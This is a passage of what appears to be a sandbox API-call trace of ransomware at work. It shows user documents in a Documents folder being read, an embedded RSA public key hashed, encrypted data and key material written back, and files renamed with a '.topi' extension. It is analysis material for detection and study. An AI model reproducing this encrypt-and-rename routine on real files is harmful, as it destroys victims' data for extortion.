Size=0x200) returned 0x31d5100 [0096.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9810 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97f8 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97c8 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97b0 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02480 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.084] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xb021, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xb021, lpOverlapped=0x0) returned 1 [0096.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.084] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xb026, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.085] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.085] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.085] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.085] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.085] CloseHandle (hObject=0x6a8) returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0096.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0096.088] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\4yC3PRKC1q.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\4yc3prkc1q.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\4yC3PRKC1q.ods.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\4yc3prkc1q.ods.topi")) returned 1 [0096.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.089] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31532f8 | out: hHeap=0x680000) returned 1 [0096.090] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe97ab840, ftCreationTime.dwHighDateTime=0x1d5c4bb, ftLastAccessTime.dwLowDateTime=0x9aeb7040, ftLastAccessTime.dwHighDateTime=0x1d5c33d, ftLastWriteTime.dwLowDateTime=0x9aeb7040, ftLastWriteTime.dwHighDateTime=0x1d5c33d, nFileSizeHigh=0x0, nFileSizeLow=0x6167, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FkG4zcTFIH.odp", cAlternateFileName="FKG4ZC~1.ODP")) returned 1 [0096.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x31532f8 [0096.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.090] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\FkG4zcTFIH.odp") returned=".odp" [0096.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\FkG4zcTFIH.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\fkg4zctfih.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.090] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=24935) returned 1 [0096.090] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.093] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6141, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.094] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.094] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.095] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x6167, lpOverlapped=0x0) returned 1 [0096.095] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.095] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.095] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.095] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.096] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.096] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.096] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.096] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.096] GetLastError () returned 0x0 [0096.096] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.096] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.096] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.096] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.096] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6170) returned 0x99f92d8 [0096.097] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02480 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97b0 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a024c8 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97c8 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97f8 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9810 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.097] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97f8 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9810 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9810 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d97f8 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9810 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97f8 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.099] GetCurrentThreadId () returned 0x8c4 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7650 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.099] GetCurrentThreadId () returned 0x8c4 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97f8 [0096.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9810 [0096.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97e0 [0096.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9828 [0096.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0096.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97f8 | out: hHeap=0x680000) returned 1 [0096.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97f8 